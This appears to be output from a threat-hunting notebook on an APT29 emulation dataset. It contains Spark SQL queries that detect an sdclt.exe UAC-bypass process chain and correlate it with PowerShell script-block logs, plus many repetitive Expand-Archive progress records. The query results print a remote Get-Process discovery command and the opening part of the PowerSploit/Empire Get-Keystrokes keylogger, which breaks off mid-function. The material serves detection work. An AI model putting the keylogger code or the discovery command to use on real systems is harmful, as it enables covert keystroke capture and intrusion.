ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="269"
 
-RECORD 81----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 82----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="268"
 
-RECORD 83----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 84----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="267"
 
-RECORD 85----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 86----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="266"
 
-RECORD 87----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 88----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="265"
 
-RECORD 89----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 90----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="264"
 
-RECORD 91----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 92----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="263"
 
-RECORD 93----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 94----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="262"
 
-RECORD 95----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 96----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="261"
 
-RECORD 97----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 98----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="260"
 
-RECORD 99----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="84"
                                                                                                                                                                                                                                                                 
only showing top 100 rows

Query ID: 4310F2AF-11EF-4EAC-A968-3436FE5F6140

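# Detection: Expand-Archive executed from the PowerShell process that descends from the
# sdclt.exe -> control.exe parent/child chain, correlated from Security 4688 process
# creation events into PowerShell 4104 script block logging.
#
# Join chain (innermost to outermost):
#   b: control.exe spawned by sdclt.exe
#   a: child of b that runs at High mandatory level (S-1-16-12288) with a full
#      elevation token (%%1937)
#   d: powershell.exe spawned by a
#   e: d's NewProcessId with the "0x" prefix stripped
#   f: 4104 script blocks whose ExecutionProcessID, rendered as lowercase hex,
#      equals e.NewProcessId and whose text mentions expand-archive
#
# Every process-name filter is lowercased before the LIKE so the match does not depend
# on how the image path was recorded; the powershell.exe filter on d was the one
# exception and is now lowercased as well.
#
# NOTE(review): the correlation is on process ids only, with no time window between the
# parent and child 4688 events or the 4104 event. Windows reuses PIDs, so on live data
# (as opposed to this bounded evaluation dataset) a stale id can join unrelated events;
# an event-time constraint between each pair of joined events would tighten it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host d
    INNER JOIN(
      SELECT a.ProcessId, a.NewProcessId
      FROM apt29Host a
      INNER JOIN (
        SELECT NewProcessId
        FROM apt29Host
        WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%control.exe"
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
      ) b
      ON a.ProcessId = b.NewProcessId
      WHERE LOWER(a.Channel) = "security"
        AND a.EventID = 4688
        AND a.MandatoryLabel = "S-1-16-12288"
        AND a.TokenElevationType = "%%1937"
    ) c
    ON d.ProcessId = c.NewProcessId
    WHERE LOWER(d.Channel) = "security"
      AND d.EventID = 4688
      AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%expand-archive%"

'''
)
# Vertical, untruncated output so the full ScriptBlockText is readable in the notebook.
df.show(100, truncate=False, vertical=True)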
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Expand-Archive -LiteralPath "$env:USERPROFILE\Downloads\SysinternalsSuite.zip" -DestinationPath "$env:USERPROFILE\Downloads\"

ScriptBlock ID: 63fc6cf4-cd9f-4134-9231-51ccb5c7d247
Path:  

4.B.1. Process Discovery

Procedure: Enumerated current running processes using PowerShell

Criteria: powershell.exe executing Get-Process

Detection Type: Telemetry (Correlated)

Query ID: CE6D61C3-C3B5-43D2-BD3C-4C1711A822DA

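# Detection: Get-Process executed from the PowerShell process that descends from the
# sdclt.exe -> control.exe parent/child chain, correlated from Sysmon event 1 process
# creation (ProcessGuid / ParentProcessGuid) into PowerShell 4104 script block logging.
#
# Join chain (innermost to outermost):
#   b: control.exe whose parent image is sdclt.exe
#   a: child of b running at IntegrityLevel High
#   d: powershell.exe whose parent is a
#   e: d's ProcessId
#   f: 4104 script blocks whose ExecutionProcessID equals e.ProcessId and whose text
#      mentions get-process
#
# The inner joins key on Sysmon ProcessGuid, which is unique per process instance, so
# they are not affected by PID reuse; only the final join to the PowerShell log is,
# because the 4104 event carries a PID (ExecutionProcessID) rather than a GUID.
#
# Every image filter is lowercased before the LIKE so the match does not depend on how
# the path was recorded; the powershell.exe filter on d was the one exception and is now
# lowercased as well.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%get-process%"

'''
)
# Vertical, untruncated output so the full ScriptBlockText is readable in the notebook.
df.show(100, truncate=False, vertical=True)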
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
